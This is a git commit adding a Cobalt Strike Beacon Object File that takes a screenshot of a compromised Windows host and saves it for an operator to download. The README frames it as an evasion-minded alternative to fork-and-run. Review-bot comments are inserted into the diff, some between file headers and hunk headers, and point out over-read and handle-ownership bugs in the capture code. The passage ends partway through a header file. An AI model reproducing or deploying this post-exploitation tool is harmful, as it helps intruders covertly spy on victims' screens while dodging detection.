commit a32d08289530f14815adec040ce527363a5a8912 Author: CodeXTF2 Date: Sun Oct 23 16:58:24 2022 +0800 first commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..b66ae99 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +/.vs \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..391a2fd --- /dev/null +++ b/README.md @@ -0,0 +1,21 @@ +# ScreenshotBOF + +An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. + +## Usage +1. import the screenshotBOF.cna script into Cobalt Strike +2. use the command screenshot_bof +3. Download the screenshot from the target e.g. +``` +download screenshot.bmp +``` + +## Notes +- no evasion is performed, which should be fine since the WinAPIs used are not malicious +- in memory downloading of screenshots is planned to be added +- the filename can be changed in the source code. + +## Why did I make this? +Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. +While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more +OPSEC safe version of the screenshot capability. \ No newline at end of file diff --git a/ScreenshotBOF.sln b/ScreenshotBOF.sln new file mode 100644 index 0000000..9997b26 --- /dev/null +++ b/ScreenshotBOF.sln 
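Review bot: The .gitignore added here excludes only `/.vs`, while the same commit checks in the contents of `ScreenshotBOF/intermediary/` (source.obj, the .tlog files and the build logs). Those logs embed absolute paths from the author's machine, and compiled objects and tlogs change on every build, so they will churn in every later commit and bloat the history. Adding `intermediary/` (and `bin/`, the project's OutDir, if it is not already excluded) to the ignore file and untracking the committed artifacts would fix this.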
@@ -0,0 +1,37 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30517.126 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + BOF|x64 = BOF|x64 + BOF|x86 = BOF|x86 + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.ActiveCfg = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.Build.0 = BOF|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.ActiveCfg = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.Build.0 = BOF|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.ActiveCfg = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.Build.0 = Debug|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.ActiveCfg = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.Build.0 = Debug|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.ActiveCfg = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.Build.0 = Release|x64 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.ActiveCfg = Release|Win32 + {C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5} + EndGlobalSection +EndGlobal diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj b/ScreenshotBOF/ScreenshotBOF.vcxproj new file mode 100644 index 0000000..95c3510 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj 
@@ -0,0 +1,277 @@ + + + + + BOF + Win32 + + + Debug + Win32 + + + Release + Win32 + + + BOF + x64 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {c04ab0f3-f7e1-4996-9cfa-d1337332ef29} + ScreenshotBOF + 10.0 + ScreenshotBOF + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + v142 + Console + + + + + Console + + v142 + + + + + + + + + + + + + + + + + + + + + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + intermediary\$(Configuration)\$(Platform)\ + $(ProjectName)x64 + + + $(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(ExtensionsToDeleteOnClean) + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)x32 + intermediary\$(Configuration)\x86\ + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)32 + + + $(SolutionDir)bin\$(Configuration)\ + $(ProjectName)64 + + + + EnableAllWarnings + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + + + Level1 + + + Console + true + + + + + Level4 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + + + Console + true + true + true + + + + + EnableAllWarnings + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + 
true + Level1 + + + Console + true + + + + + Level4 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + false + Level1 + + + Console + true + true + true + + + + + /c /Fo"intermediary\BOF\x64\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*"; +powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }" + + + + + /c /Fo"intermediary\BOF\x86\source" + + + None + false + BOF;%(PreprocessorDefinitions) + + + + + + + + + + + + + + + + + + + + + Level1 + + + xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*"; + powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }" + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.filters b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters new file mode 100644 index 0000000..582dd13 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {f23d5754-25e5-46a9-b783-8685f48d2291} + + + {72263c50-a87a-4d99-9746-3def65c61180} + + + {999efb6a-e35d-49fb-bf81-1ebab5077dd0} + + + + + Source Files + + + + + Header Files + + + Header Files + + + + + Resources + + + \ No newline at end of file diff --git a/ScreenshotBOF/ScreenshotBOF.vcxproj.user b/ScreenshotBOF/ScreenshotBOF.vcxproj.user new file mode 100644 index 0000000..88a5509 --- /dev/null +++ b/ScreenshotBOF/ScreenshotBOF.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file 
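Review bot: The BOF post-build steps dot-source `resources\strip_bof.ps1` and `xcopy` the compiled object, but that script is not among the files added in the portion of this commit visible here, so a fresh clone building the BOF configuration would fail at the post-build step (the committed build log only shows it ran on the author's machine). Either add the script to the repository or document it as an external requirement in the README. Separately, the AdditionalOptions value `/c /Fo"intermediary\BOF\x64\source"` duplicates the object-file path MSBuild already passes, which the committed log reports as warning D9025; setting the project's ObjectFileName to that path instead of overriding it would remove the warning without breaking the xcopy source path.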
diff --git a/ScreenshotBOF/Source.cpp b/ScreenshotBOF/Source.cpp
new file mode 100644
index 0000000..cb6669e
--- /dev/null
+++ b/ScreenshotBOF/Source.cpp
@@ -0,0 +1,151 @@
+#include
+#include
+#include "bofdefs.h"
+#pragma comment(lib, "User32.lib")
+#pragma comment(lib, "Gdi32.lib")
+
+
+
+#pragma region error_handling
+#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
+BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
+#ifdef BOF
+ BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
+#else
+ printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
+#endif // BOF
+
+ return FALSE;
+}
+#pragma endregion
+
+
+BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
+{
+ HDC hDC;
+ int iBits;
+ WORD wBitCount;
+ DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0;
+ BITMAP Bitmap0;
+ BITMAPFILEHEADER bmfHdr;
+ BITMAPINFOHEADER bi;
+ LPBITMAPINFOHEADER lpbi;
+ HANDLE fh, hDib, hPal, hOldPal2 = NULL;
+ hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
+ iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES);
+ DeleteDC(hDC);
+ if (iBits <= 1)
+ wBitCount = 1;
+ else if (iBits <= 4)
+ wBitCount = 4;
+ else if (iBits <= 8)
+ wBitCount = 8;
+ else
+ wBitCount = 24;
+ GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0);
+ bi.biSize = sizeof(BITMAPINFOHEADER);
+ bi.biWidth = Bitmap0.bmWidth;
+ bi.biHeight = -Bitmap0.bmHeight;
+ bi.biPlanes = 1;
+ bi.biBitCount = wBitCount;
+ bi.biCompression = BI_RGB;
+ bi.biSizeImage = 0;
+ bi.biXPelsPerMeter = 0;
+ bi.biYPelsPerMeter = 0;
+ bi.biClrImportant = 0;
+ bi.biClrUsed = 256;
+ dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8
+ * Bitmap0.bmHeight;
+ hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
+ lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
+ *lpbi = bi;
+
+ hPal = GetStockObject(DEFAULT_PALETTE);
+ if (hPal)
+ {
+ hDC = GetDC(NULL);
+ hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
+ RealizePalette(hDC);
+ }
+
+
+ GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER)
+ + dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS);
+
+ if (hOldPal2)
+ {
+ SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
+ RealizePalette(hDC);
+ ReleaseDC(NULL, hDC);
+ }
+
+ fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
+ FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
+
+ if (fh == INVALID_HANDLE_VALUE)
+ return FALSE;
+
+ bmfHdr.bfType = 0x4D42; // "BM"
+ dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
+ bmfHdr.bfSize = dwDIBSize;
+ bmfHdr.bfReserved1 = 0;
+ bmfHdr.bfReserved2 = 0;
+ bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
+
+ WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
+
+ WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
+ GlobalUnlock(hDib);
+ GlobalFree(hDib);
+ CloseHandle(fh);
+ return TRUE;
+}
+
+#ifdef BOF
+void go(char* buff, int len) {
+ BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk");
+ int x1, y1, x2, y2, w, h;
+ // get screen dimensions
+ x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
+ y1 = GetSystemMetrics(SM_YVIRTUALSCREEN);
+ x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN);
+ y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN);
+ w = x2 - x1;
+ h = y2 - y1;
+
+ // copy screen to bitmap
+ HDC hScreen = GetDC(NULL);
+ HDC hDC = CreateCompatibleDC(hScreen);
+ HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h);
+ HGDIOBJ old_obj = SelectObject(hDC, hBitmap);
+ BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY);
+
+ //I was going to pull from the clipboard but then realized it
+ //was more trouble than it was worth, so I just saved it to a file. ~ CodeX
+
+ // save bitmap to clipboard
+ OpenClipboard(NULL);
+ EmptyClipboard();
+ SetClipboardData(CF_BITMAP, hBitmap);
+ CloseClipboard();
+
+ BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
+ LPCSTR filename = "screenshot.bmp";
+ SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
+
+ BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp");
+ // clean up
+ SelectObject(hDC, old_obj);
+ DeleteDC(hDC);
+ ReleaseDC(NULL, hScreen);
+ DeleteObject(hBitmap);
+}
+
+
+#else
+
+void main(int argc, char* argv[]) {
+
+}
+
+#endif
\ No newline at end of file
diff --git a/ScreenshotBOF/beacon.h b/ScreenshotBOF/beacon.h
new file mode 100644
index 0000000..e70bebc
--- /dev/null
+++ b/ScreenshotBOF/beacon.h
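Review bot: In SaveHBITMAPToFile the second `WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);` reads `dwDIBSize` bytes from the GlobalAlloc'd block, but that block is only `sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize` bytes while `dwDIBSize` also counts `sizeof(BITMAPFILEHEADER)`, so the call over-reads 14 bytes past the allocation and appends them to the file; it should be `WriteFile(fh, (LPSTR)lpbi, dwDIBSize - sizeof(BITMAPFILEHEADER), &dwWritten, NULL);`. The same function dereferences `lpbi` without checking `GlobalAlloc`/`GlobalLock` for NULL, leaks `hDib` on the `return FALSE` after `CreateFile` fails, and `go()` discards its return value and prints the "saved" message unconditionally. In `go()`, once `SetClipboardData(CF_BITMAP, hBitmap)` succeeds the clipboard owns that bitmap, so the closing `DeleteObject(hBitmap)` frees a handle the system now holds; since the comment above that block says the clipboard route was abandoned, removing those four calls (which also discard whatever the user currently has on the clipboard) resolves the ownership conflict. `bRet`, `buff` and `len` are unused, and `void main` should be `int main` in the non-BOF build.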
@@ -0,0 +1,63 @@
+#pragma once
+
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Cobalt Strike 4.1.
+ */
+
+/* data API */
+typedef struct {
+ char * original; /* the original buffer [so we can free it] */
+ char * buffer; /* current pointer into our buffer */
+ int length; /* remaining length of data */
+ int size; /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT int BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+ char * original; /* the original buffer [so we can free it] */
+ char * buffer; /* current pointer into our buffer */
+ int length; /* remaining length of data */
+ int size; /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT 0x0
+#define CALLBACK_OUTPUT_OEM 0x1e
+#define CALLBACK_ERROR 0x0d
+#define CALLBACK_OUTPUT_UTF8 0x20
+
+DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...);
+DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len);
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void BeaconRevertToken();
+DECLSPEC_IMPORT BOOL BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max);
diff --git a/ScreenshotBOF/bofdefs.h b/ScreenshotBOF/bofdefs.h
new file mode 100644
index 0000000..c960e31
--- /dev/null
+++ b/ScreenshotBOF/bofdefs.h
@@ -0,0 +1,361 @@ +#pragma once +/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */ +#include + + +#ifdef BOF + +#ifdef __cplusplus +extern "C" { +#endif + +#include "beacon.h" + +void go(char* buff, int len); + +/* resolve some extra funcs for the screenshot */ + + DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT); +#define MessageBoxCustom User32$MessageBoxA + + DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex); +#define GetSystemMetrics User32$GetSystemMetrics + + DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd); +#define GetDC User32$GetDC + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc); +#define CreateCompatibleDC GDI32$CreateCompatibleDC + + DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy); +#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h); +#define SelectObject GDI32$SelectObject + + DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, + int x, + int y, + int cx, + int cy, + HDC hdcSrc, + int x1, + int y1, + DWORD rop); +#define BitBlt GDI32$BitBlt + + DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner); +#define OpenClipboard User32$OpenClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard(); +#define EmptyClipboard User32$EmptyClipboard + + DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem); +#define SetClipboardData User32$SetClipboardData + + DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard(); +#define CloseClipboard User32$CloseClipboard + + DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc); +#define DeleteDC GDI32$DeleteDC + + DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC); +#define ReleaseDC User32$ReleaseDC + + DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho); +#define DeleteObject GDI32$DeleteObject + + + + /* End of function resolutions for screenshot 
*/ + + /* Resolve some functions for writing BMP to disk*/ + + DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver, + LPCSTR pwszDevice, + LPCSTR pszPort, + const DEVMODEA* pdm); +#define CreateDCA GDI32$CreateDCA + + DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc, + int index); +#define GetDeviceCaps GDI32$GetDeviceCaps + + DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h, + int c, + LPVOID pv); +#define GetObjectA GDI32$GetObjectA + DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc( + UINT uFlags, + SIZE_T dwBytes); +#define GlobalAlloc KERNEL32$GlobalAlloc + + DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL); +#define GlobalLock KERNEL32$GlobalLock + + DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int); +#define GetStockObject GDI32$GetStockObject + + DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL); +#define SelectPalette GDI32$SelectPalette + + DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC); +#define RealizePalette GDI32$RealizePalette + + DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc, + HBITMAP hbm, + UINT start, + UINT cLines, + LPVOID lpvBits, + LPBITMAPINFO lpbmi, + UINT usage); +#define GetDIBits GDI32$GetDIBits + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL); +#define GlobalUnlock KERNEL32$GlobalUnlock + + DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL); +#define GlobalFree KERNEL32$GlobalFree + + DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE); +#define CloseHandle KERNEL32$CloseHandle + + + + + /* End of function resolutions for writing BMP to disk */ + + +/* COM */ +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); +DECLSPEC_IMPORT 
VOID WINAPI OLE32$CoUninitialize(); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*); +DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*); +DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg); +DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3); + +/* Registry */ +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, + CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition); +DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, + CONST BYTE* lpData, DWORD cbData); + + +/* FileSystem */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD 
nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize); +DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle); +DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); +DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen); + + +/* Memory */ +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); +DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); +DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); +DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); + + +/* Process */ +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap(); +DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead); +DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds); +DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID); 
